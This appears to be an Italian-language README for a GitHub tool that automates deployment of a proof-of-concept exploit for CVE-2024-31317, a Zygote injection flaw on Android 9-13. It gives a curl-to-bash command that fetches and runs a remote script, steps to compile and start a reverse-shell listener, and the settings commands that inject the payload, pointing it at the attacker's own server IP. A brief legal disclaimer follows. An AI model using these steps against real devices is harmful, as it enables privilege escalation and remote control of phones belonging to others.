
Strumento di distribuzione automatizzata per il PoC di CVE-2024-31317 su Android 9-13, che consente l'escalation dei privilegi tramite iniezione Zygote ed esecuzione di reverse shell.
Uno strumento di distribuzione per il proof-of-concept di CVE-2024-31317, mirato ai dispositivi Android dalla versione 9 alla 13.
CVE-2024-31317-PoC-Deployer è uno script di distribuzione automatizzato per generare e configurare rapidamente tutti i file necessari per lo sfruttamento della vulnerabilità CVE-2024-31317. Questa vulnerabilità interessa i dispositivi Android 9-13 e consente l'escalation dei privilegi e l'esecuzione di codice arbitrario tramite il processo Zygote.
reverse_shell.c - Programma reverse shell implementato in Cpayload.txt - Payload di sfruttamento appositamente costruitocompile.sh - Script di compilazione automaticaREADME.txt - Istruzioni dettagliate per l'usoCVE-2024-31317.txt - Documentazione tecnica della vulnerabilitàEsegui lo script di distribuzione remota:
pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
Compila la reverse shell:
sh compile.sh
Avvia il listener della reverse shell:
sh reverse_shell
payload.txt nella directory /data/local/tmp/ del dispositivo targetxxx.xxx.xxx in payload.txt con l'IP del tuo server di ascoltoam force-stop com.android.settings
cd /data/local/tmp/
settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
am start -n com.android.settings/.Settings
settings put global hidden_api_blacklist_exemptions "null"
Questo strumento è destinato esclusivamente a test di sicurezza e scopi di ricerca legali. È necessario ottenere un'autorizzazione esplicita dal sistema target prima dell'uso. L'uso non autorizzato potrebbe violare la legge. Lo sviluppatore non si assume alcuna responsabilità per abusi.
Questo progetto è concesso in licenza con licenza MIT - consultare il file LICENSE per i dettagli.